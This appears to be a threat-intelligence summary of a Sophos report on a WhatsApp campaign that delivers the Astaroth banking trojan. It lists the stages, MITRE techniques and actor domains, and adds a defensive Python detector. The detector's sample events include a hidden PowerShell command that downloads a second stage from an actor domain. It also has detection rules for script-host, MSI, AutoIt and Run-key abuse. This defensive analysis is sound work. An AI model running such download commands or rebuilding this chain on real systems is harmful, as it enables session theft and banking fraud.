WhatsApp compromise leads to Astaroth deployment

Sophos analysts uncovered a multi-stage WhatsApp-focused campaign (STAC3150) delivering archive attachments that deploy downloaders which fetch scripts to harvest WhatsApp session data and, in later stages, an MSI installer that installs the Astaroth (Guildma) banking trojan. The campaign used View Once messages, PowerShell and Python loaders, Selenium with WPPConnect to hijack WhatsApp Web, and actor-controlled domains such as varegjopeaks[.]com and manoelimoveiscaioba[.]com. #Astaroth #STAC3150

Keypoints

  • Campaign STAC3150 first observed on September 24, 2025, uses WhatsApp “View Once” messages delivering ZIP archives with malicious VBS or HTA files.
  • Initial downloader files launch PowerShell to retrieve second-stage payloads; early delivery used IMAP from attacker email, later shifted to HTTP via Invoke-WebRequest.
  • Second-stage payloads include PowerShell or Python scripts that use Selenium Chrome WebDriver and WPPConnect to hijack WhatsApp Web sessions and harvest contacts and session tokens.
  • In late October the campaign added an MSI installer (installer.msi) that drops Astaroth (Guildma) via a malicious AutoIt script masquerading as a .log file and creates persistence via a startup registry key.
  • Observed C2 infrastructure includes domains such as varegjopeaks[.]com (first-stage) and manoelimoveiscaioba[.]com (Astaroth C2), plus several other actor-controlled domains.
  • Sophos observed impacts to more than 250 customer devices, ~95% located in Brazil, with additional victims in other Latin American countries, the U.S., and Austria.
  • SophosLabs published detections for initial VBS/HTA downloaders, second-stage VBS/MSI files, AutoIt payloads, and provided IOCs for network/blocking/monitoring.

MITRE Techniques

  • [T1566] Phishing – Attackers delivered malicious ZIP attachments via WhatsApp “View Once” messages to lure victims into executing archived VBS/HTA files. Quote: ‘The attacks start with a message that is sent using the WhatsApp “View Once” option.’
  • [T1204] User Execution – Victims must open and execute the malicious VBS/HTA from the archive, which then launches PowerShell to retrieve additional payloads. Quote: ‘The lure delivers a ZIP archive that contains a malicious VBS or HTA file. When executed, this malicious file launches PowerShell to retrieve second-stage payloads.’
  • [T1059.001] PowerShell – Malicious VBS/HTA files launch PowerShell commands (including Invoke-WebRequest) to download second-stage payloads from attacker-controlled servers. Quote: ‘the campaign shifted to HTTP-based communication, leveraging PowerShell’s Invoke-WebRequest command to contact a remote command and control (C2) server hosted on…’
  • [T1105] Ingress Tool Transfer – Downloaded second-stage components include PowerShell/Python scripts and an MSI installer that transfer tools like Selenium WebDriver, WPPConnect libraries, and the Astaroth payload to the host. Quote: ‘The downloaded second-stage PowerShell or Python script… uses the Selenium Chrome WebDriver and the WPPConnect JavaScript library…’
  • [T1560] Archive Collected Data / Hidden Files and Directories – The MSI installer writes files to disk and uses a malicious AutoIt script masquerading as a .log file to execute Astaroth, hiding payload execution. Quote: ‘The installer file writes files to disk and creates a startup registry key…it launches the Astaroth malware via a malicious AutoIt script that masquerades as a .log file.’
  • [T1098] Account Manipulation / Valid Accounts – Scripts harvest WhatsApp contact information and session tokens by hijacking WhatsApp Web sessions, enabling abuse of valid sessions for further distribution. Quote: ‘…harvest contact information and session tokens, and facilitate spam distribution.’
  • [T1547.001] Registry Run Keys / Startup Folder – The installer creates a startup registry key to maintain persistence for the Astaroth payload. Quote: ‘The installer file… creates a startup registry key to maintain persistence.’
  • [T1071.001] Web Protocols – Actors used HTTP(S) (Invoke-WebRequest to https://www.varegjopeaks[.]com) and IMAP for payload retrieval and C2 communication. Quote: ‘PowerShell being used to retrieve the second-stage payloads via IMAP…the campaign shifted to HTTP-based communication…contact a remote command and control (C2) server hosted on https://www.varegjopeaks[.]com.’
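The Keypoints and the technique list above describe a chain a defender can hunt for in endpoint telemetry: a script host (wscript/mshta) spawning PowerShell that calls Invoke-WebRequest, a Selenium ChromeDriver launched from a script interpreter, msiexec running installer.msi, an AutoIt interpreter executing a file named as a .log, a Run-key write, and command lines that reference the published domains. The following detector is an added example, not code from Sophos or from the campaign; the event shape (kind/image/parent/cmdline/key fields), the sample events, and the heuristic rules themselves are assumptions made for this illustration.

```python
"""
Added example (not Sophos' code): flag process-creation and registry events
that match the STAC3150 / Astaroth chain summarised on this page.
Field names and sample events are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Domains published as IOCs on this page (defanged form normalised by refang()).
IOC_DOMAINS = {
    "varegjopeaks.com",
    "manoelimoveiscaioba.com",
    "docsmoonstudioclayworks.online",
    "shopeeship.com",
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}   # VBS/HTA launchers
SCRIPT_INTERPRETERS = {"python.exe", "powershell.exe", "pwsh.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\b", re.IGNORECASE)


@dataclass
class Event:
    kind: str            # "process" or "registry" (assumed schema)
    image: str = ""      # process image file name
    parent: str = ""     # parent process image file name
    cmdline: str = ""    # full command line
    key: str = ""        # registry key path for registry events


def refang(text: str) -> str:
    """Turn 'example[.]com' into 'example.com' so defanged IOCs still match."""
    return text.replace("[.]", ".")


def check_event(ev: Event) -> List[str]:
    """Return a list of findings (technique id + reason) for one event."""
    findings = []
    if ev.kind == "process":
        image, parent = ev.image.lower(), ev.parent.lower()
        cmd = refang(ev.cmdline.lower())
        # Stage 1: VBS/HTA launches PowerShell to fetch the second stage.
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            if "invoke-webrequest" in cmd or re.search(r"\biwr\b", cmd):
                findings.append("T1059.001: script host spawned PowerShell with Invoke-WebRequest")
            if "imap" in cmd:
                findings.append("T1059.001: script host spawned PowerShell referencing IMAP")
        # Stage 2 heuristic: Selenium ChromeDriver started by a script interpreter.
        if image == "chromedriver.exe" and parent in SCRIPT_INTERPRETERS:
            findings.append("T1105: ChromeDriver launched from a script interpreter (Selenium hijack heuristic)")
        # Stage 3: MSI installer named as in the report.
        if image == "msiexec.exe" and "installer.msi" in cmd:
            findings.append("T1105: msiexec executing installer.msi")
        # AutoIt interpreter fed a '.log' file (masqueraded script).
        if "autoit" in image and re.search(r"\.log\b", cmd):
            findings.append("T1036: AutoIt interpreter executing a .log file")
        # Any command line that names a published C2/hosting domain.
        for dom in IOC_DOMAINS:
            if dom in cmd:
                findings.append(f"T1071.001: command line references IOC domain {dom}")
    elif ev.kind == "registry" and RUN_KEY_RE.search(ev.key):
        findings.append("T1547.001: write under a CurrentVersion\\Run key")
    return findings


def scan(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """Run check_event over a batch; return (index, findings) for hits only."""
    hits = []
    for i, ev in enumerate(events):
        f = check_event(ev)
        if f:
            hits.append((i, f))
    return hits


# Constructed sample telemetry mirroring the chain described on the page.
SAMPLE_EVENTS = [
    Event("process", "powershell.exe", "wscript.exe",
          "powershell.exe -w hidden -c Invoke-WebRequest https://www.varegjopeaks[.]com/stage2"),
    Event("process", "chromedriver.exe", "python.exe", "chromedriver.exe --port=9515"),
    Event("process", "msiexec.exe", "powershell.exe", r"msiexec /i C:\Users\Public\installer.msi /qn"),
    Event("process", "autoit3.exe", "msiexec.exe", r"autoit3.exe C:\Users\Public\update.log"),
    Event("registry", key=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
    Event("process", "svchost.exe", "services.exe", "svchost.exe -k netsvcs"),   # benign
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(found))
```

The rules are deliberately narrow (script host as direct parent, the exact installer name, the published domains) so they can be tuned against real telemetry; the ChromeDriver rule is a hunting heuristic rather than a high-confidence signature, since legitimate automation also starts Selenium from Python or PowerShell.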

Indicators of Compromise

  • [Domain] C2 infrastructure used by STAC3150 and Astaroth campaigns – varegjopeaks[.]com, manoelimoveiscaioba[.]com
  • [Domain] Additional actor-controlled domains observed as C2 or hosting payloads – docsmoonstudioclayworks[.]online, shopeeship[.]com (and 4 more domains)
  • [File name] MSI installer used to deliver Astaroth – installer.msi
  • [File name] Malicious scripts and droppers used in initial stages – VBS/HTA dropper files (examples: VBS downloader, HTA script) and AutoIt payload masquerading as a .log file
  • [Technique/Artifact] WhatsApp session artifacts and harvested tokens – harvested contact information and session tokens via Selenium + WPPConnect (no explicit token strings published)

Read more: https://news.sophos.com/en-us/2025/11/20/whatsapp-compromise-leads-to-astaroth-deployment/